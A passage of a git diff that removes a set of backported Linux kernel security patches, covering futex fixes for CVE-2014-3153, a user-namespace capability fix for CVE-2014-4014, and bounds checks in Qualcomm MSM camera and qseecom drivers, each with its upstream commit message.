Miller ---- - net/core/filter.c | 8 +++++++- - 1 file changed, 7 insertions(+), 1 deletion(-) - -diff --git a/net/core/filter.c b/net/core/filter.c -index e08b382..0e0856f 100644 ---- a/net/core/filter.c -+++ b/net/core/filter.c -@@ -600,6 +600,9 @@ static u64 __skb_get_nlattr(u64 ctx, u64 A, u64 X, u64 r4, u64 r5) - if (skb_is_nonlinear(skb)) - return 0; - -+ if (skb->len < sizeof(struct nlattr)) -+ return 0; -+ - if (A > skb->len - sizeof(struct nlattr)) - return 0; - -@@ -618,11 +621,14 @@ static u64 __skb_get_nlattr_nest(u64 ctx, u64 A, u64 X, u64 r4, u64 r5) - if (skb_is_nonlinear(skb)) - return 0; - -+ if (skb->len < sizeof(struct nlattr)) -+ return 0; -+ - if (A > skb->len - sizeof(struct nlattr)) - return 0; - - nla = (struct nlattr *) &skb->data[A]; -- if (nla->nla_len > A - skb->len) -+ if (nla->nla_len > skb->len - A) - return 0; - - nla = nla_find_nested(nla, X); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-3153/ANY/0001.patch deleted file mode 100644 index aa84e2d1..00000000 --- a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0001.patch +++ /dev/null 
@@ -1,84 +0,0 @@ -From e9c243a5a6de0be8e584c604d353412584b592f8 Mon Sep 17 00:00:00 2001 -From: Thomas Gleixner -Date: Tue, 3 Jun 2014 12:27:06 +0000 -Subject: futex-prevent-requeue-pi-on-same-futex.patch futex: Forbid uaddr == - uaddr2 in futex_requeue(..., requeue_pi=1) - -If uaddr == uaddr2, then we have broken the rule of only requeueing from -a non-pi futex to a pi futex with this call. If we attempt this, then -dangling pointers may be left for rt_waiter resulting in an exploitable -condition. - -This change brings futex_requeue() in line with futex_wait_requeue_pi() -which performs the same check as per commit 6f7b0a2a5c0f ("futex: Forbid -uaddr == uaddr2 in futex_wait_requeue_pi()") - -[ tglx: Compare the resulting keys as well, as uaddrs might be - different depending on the mapping ] - -Fixes CVE-2014-3153. - -Reported-by: Pinkie Pie -Signed-off-by: Will Drewry -Signed-off-by: Kees Cook -Cc: stable@vger.kernel.org -Signed-off-by: Thomas Gleixner -Reviewed-by: Darren Hart -Signed-off-by: Linus Torvalds ---- - kernel/futex.c | 25 +++++++++++++++++++++++++ - 1 file changed, 25 insertions(+) - -diff --git a/kernel/futex.c b/kernel/futex.c -index 81dbe77..663ea2b 100644 ---- a/kernel/futex.c -+++ b/kernel/futex.c -@@ -1442,6 +1442,13 @@ static int futex_requeue(u32 __user *uaddr1, unsigned int flags, - - if (requeue_pi) { - /* -+ * Requeue PI only works on two distinct uaddrs. This -+ * check is only valid for private futexes. See below. -+ */ -+ if (uaddr1 == uaddr2) -+ return -EINVAL; -+ -+ /* - * requeue_pi requires a pi_state, try to allocate it now - * without any locks in case it fails. - */ -@@ -1479,6 +1486,15 @@ retry: - if (unlikely(ret != 0)) - goto out_put_key1; - -+ /* -+ * The check above which compares uaddrs is not sufficient for -+ * shared futexes. 
We need to compare the keys: -+ */ -+ if (requeue_pi && match_futex(&key1, &key2)) { -+ ret = -EINVAL; -+ goto out_put_keys; -+ } -+ - hb1 = hash_futex(&key1); - hb2 = hash_futex(&key2); - -@@ -2525,6 +2541,15 @@ static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags, - if (ret) - goto out_key2; - -+ /* -+ * The check above which compares uaddrs is not sufficient for -+ * shared futexes. We need to compare the keys: -+ */ -+ if (match_futex(&q.key, &key2)) { -+ ret = -EINVAL; -+ goto out_put_keys; -+ } -+ - /* Queue the futex_q, drop the hb lock, wait for wakeup. */ - futex_wait_queue_me(hb, &q, to); - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-3153/ANY/0002.patch deleted file mode 100644 index 3a9932a5..00000000 --- a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0002.patch +++ /dev/null 
@@ -1,100 +0,0 @@ -From 13fbca4c6ecd96ec1a1cfa2e4f2ce191fe928a5e Mon Sep 17 00:00:00 2001 -From: Thomas Gleixner -Date: Tue, 3 Jun 2014 12:27:07 +0000 -Subject: futex: Always cleanup owner tid in unlock_pi - -If the owner died bit is set at futex_unlock_pi, we currently do not -cleanup the user space futex. So the owner TID of the current owner -(the unlocker) persists. That's observable inconsistant state, -especially when the ownership of the pi state got transferred. - -Clean it up unconditionally. - -Signed-off-by: Thomas Gleixner -Cc: Kees Cook -Cc: Will Drewry -Cc: Darren Hart -Cc: stable@vger.kernel.org -Signed-off-by: Linus Torvalds ---- - kernel/futex.c | 40 ++++++++++++++++++---------------------- - 1 file changed, 18 insertions(+), 22 deletions(-) - -diff --git a/kernel/futex.c b/kernel/futex.c -index 520e7b2..e1cb1ba 100644 ---- a/kernel/futex.c -+++ b/kernel/futex.c -@@ -1052,6 +1052,7 @@ static int wake_futex_pi(u32 __user *uaddr, u32 uval, struct futex_q *this) - struct task_struct *new_owner; - struct futex_pi_state *pi_state = this->pi_state; - u32 uninitialized_var(curval), newval; -+ int ret = 0; - - if (!pi_state) - return -EINVAL; -@@ -1075,23 +1076,19 @@ static int wake_futex_pi(u32 __user *uaddr, u32 uval, struct futex_q *this) - new_owner = this->task; - - /* -- * We pass it to the next owner. (The WAITERS bit is always -- * kept enabled while there is PI state around. We must also -- * preserve the owner died bit.) -+ * We pass it to the next owner. The WAITERS bit is always -+ * kept enabled while there is PI state around. We cleanup the -+ * owner died bit, because we are the owner. 
- */ -- if (!(uval & FUTEX_OWNER_DIED)) { -- int ret = 0; -- -- newval = FUTEX_WAITERS | task_pid_vnr(new_owner); -+ newval = FUTEX_WAITERS | task_pid_vnr(new_owner); - -- if (cmpxchg_futex_value_locked(&curval, uaddr, uval, newval)) -- ret = -EFAULT; -- else if (curval != uval) -- ret = -EINVAL; -- if (ret) { -- raw_spin_unlock(&pi_state->pi_mutex.wait_lock); -- return ret; -- } -+ if (cmpxchg_futex_value_locked(&curval, uaddr, uval, newval)) -+ ret = -EFAULT; -+ else if (curval != uval) -+ ret = -EINVAL; -+ if (ret) { -+ raw_spin_unlock(&pi_state->pi_mutex.wait_lock); -+ return ret; - } - - raw_spin_lock_irq(&pi_state->owner->pi_lock); -@@ -2351,9 +2348,10 @@ retry: - /* - * To avoid races, try to do the TID -> 0 atomic transition - * again. If it succeeds then we can return without waking -- * anyone else up: -+ * anyone else up. We only try this if neither the waiters nor -+ * the owner died bit are set. - */ -- if (!(uval & FUTEX_OWNER_DIED) && -+ if (!(uval & ~FUTEX_TID_MASK) && - cmpxchg_futex_value_locked(&uval, uaddr, vpid, 0)) - goto pi_faulted; - /* -@@ -2383,11 +2381,9 @@ retry: - /* - * No waiters - kernel unlocks the futex: - */ -- if (!(uval & FUTEX_OWNER_DIED)) { -- ret = unlock_futex_pi(uaddr, uval); -- if (ret == -EFAULT) -- goto pi_faulted; -- } -+ ret = unlock_futex_pi(uaddr, uval); -+ if (ret == -EFAULT) -+ goto pi_faulted; - - out_unlock: - spin_unlock(&hb->lock); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2014-3153/ANY/0003.patch deleted file mode 100644 index beda251e..00000000 --- a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0003.patch +++ /dev/null 
@@ -1,279 +0,0 @@ -From 54a217887a7b658e2650c3feff22756ab80c7339 Mon Sep 17 00:00:00 2001 -From: Thomas Gleixner -Date: Tue, 3 Jun 2014 12:27:08 +0000 -Subject: futex: Make lookup_pi_state more robust - -The current implementation of lookup_pi_state has ambigous handling of -the TID value 0 in the user space futex. We can get into the kernel -even if the TID value is 0, because either there is a stale waiters bit -or the owner died bit is set or we are called from the requeue_pi path -or from user space just for fun. - -The current code avoids an explicit sanity check for pid = 0 in case -that kernel internal state (waiters) are found for the user space -address. This can lead to state leakage and worse under some -circumstances. - -Handle the cases explicit: - - Waiter | pi_state | pi->owner | uTID | uODIED | ? - - [1] NULL | --- | --- | 0 | 0/1 | Valid - [2] NULL | --- | --- | >0 | 0/1 | Valid - - [3] Found | NULL | -- | Any | 0/1 | Invalid - - [4] Found | Found | NULL | 0 | 1 | Valid - [5] Found | Found | NULL | >0 | 1 | Invalid - - [6] Found | Found | task | 0 | 1 | Valid - - [7] Found | Found | NULL | Any | 0 | Invalid - - [8] Found | Found | task | ==taskTID | 0/1 | Valid - [9] Found | Found | task | 0 | 0 | Invalid - [10] Found | Found | task | !=taskTID | 0/1 | Invalid - - [1] Indicates that the kernel can acquire the futex atomically. We - came came here due to a stale FUTEX_WAITERS/FUTEX_OWNER_DIED bit. - - [2] Valid, if TID does not belong to a kernel thread. If no matching - thread is found then it indicates that the owner TID has died. - - [3] Invalid. The waiter is queued on a non PI futex - - [4] Valid state after exit_robust_list(), which sets the user space - value to FUTEX_WAITERS | FUTEX_OWNER_DIED. - - [5] The user space value got manipulated between exit_robust_list() - and exit_pi_state_list() - - [6] Valid state after exit_pi_state_list() which sets the new owner in - the pi_state but cannot access the user space value. 
- - [7] pi_state->owner can only be NULL when the OWNER_DIED bit is set. - - [8] Owner and user space value match - - [9] There is no transient state which sets the user space TID to 0 - except exit_robust_list(), but this is indicated by the - FUTEX_OWNER_DIED bit. See [4] - -[10] There is no transient state which leaves owner and user space - TID out of sync. - -Signed-off-by: Thomas Gleixner -Cc: Kees Cook -Cc: Will Drewry -Cc: Darren Hart -Cc: stable@vger.kernel.org -Signed-off-by: Linus Torvalds ---- - kernel/futex.c | 134 +++++++++++++++++++++++++++++++++++++++++++++------------ - 1 file changed, 106 insertions(+), 28 deletions(-) - -diff --git a/kernel/futex.c b/kernel/futex.c -index e1cb1ba..de938d2 100644 ---- a/kernel/futex.c -+++ b/kernel/futex.c -@@ -743,10 +743,58 @@ void exit_pi_state_list(struct task_struct *curr) - raw_spin_unlock_irq(&curr->pi_lock); - } - -+/* -+ * We need to check the following states: -+ * -+ * Waiter | pi_state | pi->owner | uTID | uODIED | ? -+ * -+ * [1] NULL | --- | --- | 0 | 0/1 | Valid -+ * [2] NULL | --- | --- | >0 | 0/1 | Valid -+ * -+ * [3] Found | NULL | -- | Any | 0/1 | Invalid -+ * -+ * [4] Found | Found | NULL | 0 | 1 | Valid -+ * [5] Found | Found | NULL | >0 | 1 | Invalid -+ * -+ * [6] Found | Found | task | 0 | 1 | Valid -+ * -+ * [7] Found | Found | NULL | Any | 0 | Invalid -+ * -+ * [8] Found | Found | task | ==taskTID | 0/1 | Valid -+ * [9] Found | Found | task | 0 | 0 | Invalid -+ * [10] Found | Found | task | !=taskTID | 0/1 | Invalid -+ * -+ * [1] Indicates that the kernel can acquire the futex atomically. We -+ * came came here due to a stale FUTEX_WAITERS/FUTEX_OWNER_DIED bit. -+ * -+ * [2] Valid, if TID does not belong to a kernel thread. If no matching -+ * thread is found then it indicates that the owner TID has died. -+ * -+ * [3] Invalid. The waiter is queued on a non PI futex -+ * -+ * [4] Valid state after exit_robust_list(), which sets the user space -+ * value to FUTEX_WAITERS | FUTEX_OWNER_DIED. 
-+ * -+ * [5] The user space value got manipulated between exit_robust_list() -+ * and exit_pi_state_list() -+ * -+ * [6] Valid state after exit_pi_state_list() which sets the new owner in -+ * the pi_state but cannot access the user space value. -+ * -+ * [7] pi_state->owner can only be NULL when the OWNER_DIED bit is set. -+ * -+ * [8] Owner and user space value match -+ * -+ * [9] There is no transient state which sets the user space TID to 0 -+ * except exit_robust_list(), but this is indicated by the -+ * FUTEX_OWNER_DIED bit. See [4] -+ * -+ * [10] There is no transient state which leaves owner and user space -+ * TID out of sync. -+ */ - static int - lookup_pi_state(u32 uval, struct futex_hash_bucket *hb, -- union futex_key *key, struct futex_pi_state **ps, -- struct task_struct *task) -+ union futex_key *key, struct futex_pi_state **ps) - { - struct futex_pi_state *pi_state = NULL; - struct futex_q *this, *next; -@@ -756,12 +804,13 @@ lookup_pi_state(u32 uval, struct futex_hash_bucket *hb, - plist_for_each_entry_safe(this, next, &hb->chain, list) { - if (match_futex(&this->key, key)) { - /* -- * Another waiter already exists - bump up -- * the refcount and return its pi_state: -+ * Sanity check the waiter before increasing -+ * the refcount and attaching to it. - */ - pi_state = this->pi_state; - /* -- * Userspace might have messed up non-PI and PI futexes -+ * Userspace might have messed up non-PI and -+ * PI futexes [3] - */ - if (unlikely(!pi_state)) - return -EINVAL; -@@ -769,44 +818,70 @@ lookup_pi_state(u32 uval, struct futex_hash_bucket *hb, - WARN_ON(!atomic_read(&pi_state->refcount)); - - /* -- * When pi_state->owner is NULL then the owner died -- * and another waiter is on the fly. pi_state->owner -- * is fixed up by the task which acquires -- * pi_state->rt_mutex. -- * -- * We do not check for pid == 0 which can happen when -- * the owner died and robust_list_exit() cleared the -- * TID. 
-+ * Handle the owner died case: - */ -- if (pid && pi_state->owner) { -+ if (uval & FUTEX_OWNER_DIED) { - /* -- * Bail out if user space manipulated the -- * futex value. -+ * exit_pi_state_list sets owner to NULL and -+ * wakes the topmost waiter. The task which -+ * acquires the pi_state->rt_mutex will fixup -+ * owner. - */ -- if (pid != task_pid_vnr(pi_state->owner)) -+ if (!pi_state->owner) { -+ /* -+ * No pi state owner, but the user -+ * space TID is not 0. Inconsistent -+ * state. [5] -+ */ -+ if (pid) -+ return -EINVAL; -+ /* -+ * Take a ref on the state and -+ * return. [4] -+ */ -+ goto out_state; -+ } -+ -+ /* -+ * If TID is 0, then either the dying owner -+ * has not yet executed exit_pi_state_list() -+ * or some waiter acquired the rtmutex in the -+ * pi state, but did not yet fixup the TID in -+ * user space. -+ * -+ * Take a ref on the state and return. [6] -+ */ -+ if (!pid) -+ goto out_state; -+ } else { -+ /* -+ * If the owner died bit is not set, -+ * then the pi_state must have an -+ * owner. [7] -+ */ -+ if (!pi_state->owner) - return -EINVAL; - } - - /* -- * Protect against a corrupted uval. If uval -- * is 0x80000000 then pid is 0 and the waiter -- * bit is set. So the deadlock check in the -- * calling code has failed and we did not fall -- * into the check above due to !pid. -+ * Bail out if user space manipulated the -+ * futex value. If pi state exists then the -+ * owner TID must be the same as the user -+ * space TID. 
[9/10] - */ -- if (task && pi_state->owner == task) -- return -EDEADLK; -+ if (pid != task_pid_vnr(pi_state->owner)) -+ return -EINVAL; - -+ out_state: - atomic_inc(&pi_state->refcount); - *ps = pi_state; -- - return 0; - } - } - - /* - * We are the first waiter - try to look up the real owner and attach -- * the new pi_state to it, but bail out when TID = 0 -+ * the new pi_state to it, but bail out when TID = 0 [1] - */ - if (!pid) - return -ESRCH; -@@ -839,6 +914,9 @@ lookup_pi_state(u32 uval, struct futex_hash_bucket *hb, - return ret; - } - -+ /* -+ * No existing pi state. First waiter. [2] -+ */ - pi_state = alloc_pi_state(); - - /* -@@ -959,7 +1037,7 @@ retry: - * We dont have the lock. Look up the PI state (or create it if - * we are the first waiter): - */ -- ret = lookup_pi_state(uval, hb, key, ps, task); -+ ret = lookup_pi_state(uval, hb, key, ps); - - if (unlikely(ret)) { - switch (ret) { -@@ -1565,7 +1643,7 @@ retry_private: - * rereading and handing potential crap to - * lookup_pi_state. - */ -- ret = lookup_pi_state(ret, hb2, &key2, &pi_state, NULL); -+ ret = lookup_pi_state(ret, hb2, &key2, &pi_state); - } - - switch (ret) { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2014-3153/ANY/0004.patch deleted file mode 100644 index 05ac287f..00000000 --- a/Patches/Linux_CVEs/CVE-2014-3153/ANY/0004.patch +++ /dev/null 
@@ -1,56 +0,0 @@ -From b3eaa9fc5cd0a4d74b18f6b8dc617aeaf1873270 Mon Sep 17 00:00:00 2001 -From: Thomas Gleixner -Date: Tue, 3 Jun 2014 12:27:06 +0000 -Subject: futex: Validate atomic acquisition in futex_lock_pi_atomic() - -We need to protect the atomic acquisition in the kernel against rogue -user space which sets the user space futex to 0, so the kernel side -acquisition succeeds while there is existing state in the kernel -associated to the real owner. - -Verify whether the futex has waiters associated with kernel state. If -it has, return -EINVAL. The state is corrupted already, so no point in -cleaning it up. Subsequent calls will fail as well. Not our problem. - -[ tglx: Use futex_top_waiter() and explain why we do not need to try - restoring the already corrupted user space state. ] - -Signed-off-by: Darren Hart -Cc: Kees Cook -Cc: Will Drewry -Cc: stable@vger.kernel.org -Signed-off-by: Thomas Gleixner -Signed-off-by: Linus Torvalds ---- - kernel/futex.c | 14 +++++++++++--- - 1 file changed, 11 insertions(+), 3 deletions(-) - -diff --git a/kernel/futex.c b/kernel/futex.c -index 663ea2b..520e7b2 100644 ---- a/kernel/futex.c -+++ b/kernel/futex.c -@@ -910,10 +910,18 @@ retry: - return -EDEADLK; - - /* -- * Surprise - we got the lock. Just return to userspace: -+ * Surprise - we got the lock, but we do not trust user space at all. - */ -- if (unlikely(!curval)) -- return 1; -+ if (unlikely(!curval)) { -+ /* -+ * We verify whether there is kernel state for this -+ * futex. If not, we can safely assume, that the 0 -> -+ * TID transition is correct. If state exists, we do -+ * not bother to fixup the user space state as it was -+ * corrupted already. -+ */ -+ return futex_top_waiter(hb, key) ? -EINVAL : 1; -+ } - - uval = curval; - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-4014/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4014/ANY/0001.patch deleted file mode 100644 index 288e918c..00000000 
--- a/Patches/Linux_CVEs/CVE-2014-4014/ANY/0001.patch
+++ /dev/null
@@ -1,206 +0,0 @@ -From 23adbe12ef7d3d4195e80800ab36b37bee28cd03 Mon Sep 17 00:00:00 2001 -From: Andy Lutomirski -Date: Tue, 10 Jun 2014 12:45:42 -0700 -Subject: fs,userns: Change inode_capable to capable_wrt_inode_uidgid - -The kernel has no concept of capabilities with respect to inodes; inodes -exist independently of namespaces. For example, inode_capable(inode, -CAP_LINUX_IMMUTABLE) would be nonsense. - -This patch changes inode_capable to check for uid and gid mappings and -renames it to capable_wrt_inode_uidgid, which should make it more -obvious what it does. - -Fixes CVE-2014-4014. - -Cc: Theodore Ts'o -Cc: Serge Hallyn -Cc: "Eric W. Biederman" -Cc: Dave Chinner -Cc: stable@vger.kernel.org -Signed-off-by: Andy Lutomirski -Signed-off-by: Linus Torvalds ---- - fs/attr.c | 8 ++++---- - fs/inode.c | 10 +++++++--- - fs/namei.c | 11 ++++++----- - fs/xfs/xfs_ioctl.c | 2 +- - include/linux/capability.h | 2 +- - kernel/capability.c | 20 ++++++++------------ - 6 files changed, 27 insertions(+), 26 deletions(-) - -diff --git a/fs/attr.c b/fs/attr.c -index 5d4e59d..6530ced 100644 ---- a/fs/attr.c -+++ b/fs/attr.c -@@ -50,14 +50,14 @@ int inode_change_ok(const struct inode *inode, struct iattr *attr) - if ((ia_valid & ATTR_UID) && - (!uid_eq(current_fsuid(), inode->i_uid) || - !uid_eq(attr->ia_uid, inode->i_uid)) && -- !inode_capable(inode, CAP_CHOWN)) -+ !capable_wrt_inode_uidgid(inode, CAP_CHOWN)) - return -EPERM; - - /* Make sure caller can chgrp. */ - if ((ia_valid & ATTR_GID) && - (!uid_eq(current_fsuid(), inode->i_uid) || - (!in_group_p(attr->ia_gid) && !gid_eq(attr->ia_gid, inode->i_gid))) && -- !inode_capable(inode, CAP_CHOWN)) -+ !capable_wrt_inode_uidgid(inode, CAP_CHOWN)) - return -EPERM; - - /* Make sure a caller can chmod. */ -@@ -67,7 +67,7 @@ int inode_change_ok(const struct inode *inode, struct iattr *attr) - /* Also check the setgid bit! */ - if (!in_group_p((ia_valid & ATTR_GID) ? 
attr->ia_gid : - inode->i_gid) && -- !inode_capable(inode, CAP_FSETID)) -+ !capable_wrt_inode_uidgid(inode, CAP_FSETID)) - attr->ia_mode &= ~S_ISGID; - } - -@@ -160,7 +160,7 @@ void setattr_copy(struct inode *inode, const struct iattr *attr) - umode_t mode = attr->ia_mode; - - if (!in_group_p(inode->i_gid) && -- !inode_capable(inode, CAP_FSETID)) -+ !capable_wrt_inode_uidgid(inode, CAP_FSETID)) - mode &= ~S_ISGID; - inode->i_mode = mode; - } -diff --git a/fs/inode.c b/fs/inode.c -index 2feb9b6..6eecb7f 100644 ---- a/fs/inode.c -+++ b/fs/inode.c -@@ -1839,14 +1839,18 @@ EXPORT_SYMBOL(inode_init_owner); - * inode_owner_or_capable - check current task permissions to inode - * @inode: inode being checked - * -- * Return true if current either has CAP_FOWNER to the inode, or -- * owns the file. -+ * Return true if current either has CAP_FOWNER in a namespace with the -+ * inode owner uid mapped, or owns the file. - */ - bool inode_owner_or_capable(const struct inode *inode) - { -+ struct user_namespace *ns; -+ - if (uid_eq(current_fsuid(), inode->i_uid)) - return true; -- if (inode_capable(inode, CAP_FOWNER)) -+ -+ ns = current_user_ns(); -+ if (ns_capable(ns, CAP_FOWNER) && kuid_has_mapping(ns, inode->i_uid)) - return true; - return false; - } -diff --git a/fs/namei.c b/fs/namei.c -index 8016827..985c6f3 100644 ---- a/fs/namei.c -+++ b/fs/namei.c -@@ -332,10 +332,11 @@ int generic_permission(struct inode *inode, int mask) - - if (S_ISDIR(inode->i_mode)) { - /* DACs are overridable for directories */ -- if (inode_capable(inode, CAP_DAC_OVERRIDE)) -+ if (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE)) - return 0; - if (!(mask & MAY_WRITE)) -- if (inode_capable(inode, CAP_DAC_READ_SEARCH)) -+ if (capable_wrt_inode_uidgid(inode, -+ CAP_DAC_READ_SEARCH)) - return 0; - return -EACCES; - } -@@ -345,7 +346,7 @@ int generic_permission(struct inode *inode, int mask) - * at least one exec bit set. 
- */ - if (!(mask & MAY_EXEC) || (inode->i_mode & S_IXUGO)) -- if (inode_capable(inode, CAP_DAC_OVERRIDE)) -+ if (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE)) - return 0; - - /* -@@ -353,7 +354,7 @@ int generic_permission(struct inode *inode, int mask) - */ - mask &= MAY_READ | MAY_WRITE | MAY_EXEC; - if (mask == MAY_READ) -- if (inode_capable(inode, CAP_DAC_READ_SEARCH)) -+ if (capable_wrt_inode_uidgid(inode, CAP_DAC_READ_SEARCH)) - return 0; - - return -EACCES; -@@ -2379,7 +2380,7 @@ static inline int check_sticky(struct inode *dir, struct inode *inode) - return 0; - if (uid_eq(dir->i_uid, fsuid)) - return 0; -- return !inode_capable(inode, CAP_FOWNER); -+ return !capable_wrt_inode_uidgid(inode, CAP_FOWNER); - } - - /* -diff --git a/fs/xfs/xfs_ioctl.c b/fs/xfs/xfs_ioctl.c -index 0b18776..6152cbe 100644 ---- a/fs/xfs/xfs_ioctl.c -+++ b/fs/xfs/xfs_ioctl.c -@@ -1215,7 +1215,7 @@ xfs_ioctl_setattr( - * cleared upon successful return from chown() - */ - if ((ip->i_d.di_mode & (S_ISUID|S_ISGID)) && -- !inode_capable(VFS_I(ip), CAP_FSETID)) -+ !capable_wrt_inode_uidgid(VFS_I(ip), CAP_FSETID)) - ip->i_d.di_mode &= ~(S_ISUID|S_ISGID); - - /* -diff --git a/include/linux/capability.h b/include/linux/capability.h -index a6ee1f9..84b13ad 100644 ---- a/include/linux/capability.h -+++ b/include/linux/capability.h -@@ -210,7 +210,7 @@ extern bool has_ns_capability_noaudit(struct task_struct *t, - struct user_namespace *ns, int cap); - extern bool capable(int cap); - extern bool ns_capable(struct user_namespace *ns, int cap); --extern bool inode_capable(const struct inode *inode, int cap); -+extern bool capable_wrt_inode_uidgid(const struct inode *inode, int cap); - extern bool file_ns_capable(const struct file *file, struct user_namespace *ns, int cap); - - /* audit system wants to get cap info from files as well */ -diff --git a/kernel/capability.c b/kernel/capability.c -index 84b2bbf..a5cf13c 100644 ---- a/kernel/capability.c -+++ b/kernel/capability.c -@@ -424,23 
+424,19 @@ bool capable(int cap) - EXPORT_SYMBOL(capable); - - /** -- * inode_capable - Check superior capability over inode -+ * capable_wrt_inode_uidgid - Check nsown_capable and uid and gid mapped - * @inode: The inode in question - * @cap: The capability in question - * -- * Return true if the current task has the given superior capability -- * targeted at it's own user namespace and that the given inode is owned -- * by the current user namespace or a child namespace. -- * -- * Currently we check to see if an inode is owned by the current -- * user namespace by seeing if the inode's owner maps into the -- * current user namespace. -- * -+ * Return true if the current task has the given capability targeted at -+ * its own user namespace and that the given inode's uid and gid are -+ * mapped into the current user namespace. - */ --bool inode_capable(const struct inode *inode, int cap) -+bool capable_wrt_inode_uidgid(const struct inode *inode, int cap) - { - struct user_namespace *ns = current_user_ns(); - -- return ns_capable(ns, cap) && kuid_has_mapping(ns, inode->i_uid); -+ return ns_capable(ns, cap) && kuid_has_mapping(ns, inode->i_uid) && -+ kgid_has_mapping(ns, inode->i_gid); - } --EXPORT_SYMBOL(inode_capable); -+EXPORT_SYMBOL(capable_wrt_inode_uidgid); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-4321/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4321/ANY/0001.patch deleted file mode 100644 index 142053d4..00000000 --- a/Patches/Linux_CVEs/CVE-2014-4321/ANY/0001.patch +++ /dev/null 
@@ -1,66 +0,0 @@
-From 68c459daa22a26d6ca8f169baef6605ca8a285f2 Mon Sep 17 00:00:00 2001
-From: Alok Kediya
-Date: Tue, 9 Dec 2014 12:53:29 +0530
-Subject: msm: camera: isp: Validate reg_offset and len parameters
-
-Validate reg_offset and len parameters before consuming to
-avoid invalid register access.
-
-Change-Id: I07676a6d10a9945fb0b99ebfd147075f896fbfab
-Signed-off-by: Alok Kediya
----
- .../platform/msm/camera_v2/isp/msm_isp_util.c | 36 +++++++++++++++++++---
- 1 file changed, 31 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index 12fd081..620c01a 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -495,13 +495,39 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- uint32_t *cfg_data, uint32_t cmd_len)
- {
- switch (reg_cfg_cmd->cmd_type) {
-- case VFE_WRITE: {
-- if (resource_size(vfe_dev->vfe_mem) <
-- (reg_cfg_cmd->u.rw_info.reg_offset +
-- reg_cfg_cmd->u.rw_info.len)) {
-- pr_err("%s: VFE_WRITE: Invalid length\n", __func__);
-+ case VFE_WRITE:
-+ case VFE_READ: {
-+ if ((reg_cfg_cmd->u.rw_info.reg_offset >
-+ (UINT_MAX - reg_cfg_cmd->u.rw_info.len)) ||
-+ ((reg_cfg_cmd->u.rw_info.reg_offset +
-+ reg_cfg_cmd->u.rw_info.len) >
-+ resource_size(vfe_dev->vfe_mem))) {
-+ pr_err("%s:%d reg_offset %d len %d res %d\n",
-+ __func__, __LINE__,
-+ reg_cfg_cmd->u.rw_info.reg_offset,
-+ reg_cfg_cmd->u.rw_info.len,
-+ (uint32_t)resource_size(vfe_dev->vfe_mem));
- return -EINVAL;
- }
-+
-+ if ((reg_cfg_cmd->u.rw_info.cmd_data_offset >
-+ (UINT_MAX - reg_cfg_cmd->u.rw_info.len)) ||
-+ ((reg_cfg_cmd->u.rw_info.cmd_data_offset +
-+ reg_cfg_cmd->u.rw_info.len) > cmd_len)) {
-+ pr_err("%s:%d cmd_data_offset %d len %d cmd_len %d\n",
-+ __func__, __LINE__,
-+ reg_cfg_cmd->u.rw_info.cmd_data_offset,
-+ reg_cfg_cmd->u.rw_info.len, cmd_len);
-+ return -EINVAL;
-+ }
-+
break;
-+ }
-+ default:
-+ break;
-+ }
-+
-+ switch (reg_cfg_cmd->cmd_type) {
-+ case VFE_WRITE: {
- msm_camera_io_memcpy(vfe_dev->vfe_base +
- reg_cfg_cmd->u.rw_info.reg_offset,
- cfg_data + reg_cfg_cmd->u.rw_info.cmd_data_offset/4,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4322/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4322/ANY/0001.patch
deleted file mode 100644
index 9fa7e42e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4322/ANY/0001.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From b9470692c228608ef0ec60747ac2732ad7ffedf0 Mon Sep 17 00:00:00 2001
-From: Mona Hossain
-Date: Thu, 9 Oct 2014 12:00:03 -0700
-Subject: qseecom: Add boundary checks for offset within message.
-
-Qseecom driver does not have boundary checks for offset within the
-message. So this patch add checks to validate the offsets sent by
-client to modify data within the command request message and it
-should not exceed the memory allocated for that message.
-
-Change-Id: I29bfbdc154eebb4f3f4bfbb31789562e37fa5886
-Signed-off-by: Mona Hossain
-Signed-off-by: Mallikarjuna Reddy Amireddy
----
- drivers/misc/qseecom.c | 49 +++++++++++++++++++++++++++++++++++++++++++++++++
- 1 file changed, 49 insertions(+)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 3a93469..b091acd 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1525,6 +1525,30 @@ static int qseecom_send_cmd(struct qseecom_dev_handle *data, void __user *argp)
- return ret;
- }
-
-+int boundary_checks_offset(struct qseecom_send_modfd_cmd_req *cmd_req,
-+ struct qseecom_send_modfd_listener_resp *lstnr_resp,
-+ struct qseecom_dev_handle *data, bool listener_svc,
-+ int i) {
-+ int ret = 0;
-+
-+ if ((!listener_svc) && (cmd_req->ifd_data[i].fd > 0)) {
-+ if (cmd_req->ifd_data[i].cmd_buf_offset >
-+ cmd_req->cmd_req_len - sizeof(uint32_t)) {
